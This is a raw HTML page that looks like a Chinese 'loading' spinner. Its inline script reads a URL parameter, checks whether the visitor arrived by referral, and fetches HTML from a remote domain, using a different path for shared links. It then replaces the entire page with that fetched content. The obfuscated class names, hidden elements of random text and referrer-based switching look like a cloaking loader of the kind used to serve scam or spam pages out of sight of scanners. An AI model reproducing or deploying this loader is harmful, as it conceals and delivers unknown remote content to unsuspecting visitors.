<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OcFU0b {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OcFU0b .kiSjmhSTIoX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OcFU0b .content {
            line-height: 50px;
            text-align: center
        }

        .OcFU0b .img {
            width: 100%
        }

        .OcFU0b .ZMmYu5a {
            text-align: center
        }

        .OcFU0b .ZMmYu5a span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OcFU0b .ZMmYu5a span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OcFU0b .ZMmYu5a span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OcFU0b .ZMmYu5a span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OcFU0b .ZMmYu5a span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OcFU0b .ZMmYu5a span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OcFU0b .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function hZOFrKyLDxlc(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var BLz5kb = hZOFrKyLDxlc('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ BLz5kb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ BLz5kb +".html?a=share";
		}
		
        oVceUH=url+"#"+new Date().getTime();
        oVceUH && function() {
            $.get(oVceUH, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >SsjDoAHKACT8sQ2SK4dT4eVJAgttOCQMmiThntpNqC4WwIeZb2jTPdZ0quweIQE8</b>
<ul style='display:none' >bTMFhuC4U75tb8z682kPCGUwRSpIhI7h4Is8mx1aHd2tMFLVpqbFx0fziLNj1R1K</ul>
<b style='display:none' >SsjDoAHKACT8sQ2SK4dT4eVJAgttOCQMmiThntpNqC4WwIeZb2jTPdZ0quweIQE8</b>
<li style='display:none' >Xsf8gF9KI8QRV5g2Bvr</li>
<p  style='display:none'>utox84MrAuSQYCas0u</p><div class="OcFU0b">
    <div class="kiSjmhSTIoX">
        <div class="ZMmYu5a">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>knQNvl6CzAIyeW9X9bBBWqc2E8DEWxNdk1Ic7wZvPv7CW4ujn8WFYZ</a>
<h1 style='display:none' >oX8deYUzyNCGAyjFm5L0wmKDFUnsmqbsTLAmlVk8JIKCRcChfymEDtJGk1uZgtbIFjqB</h1>
<b style='display:none' >lJvwun5XzRy0bmb6IRnG6jn</b></body>
</html>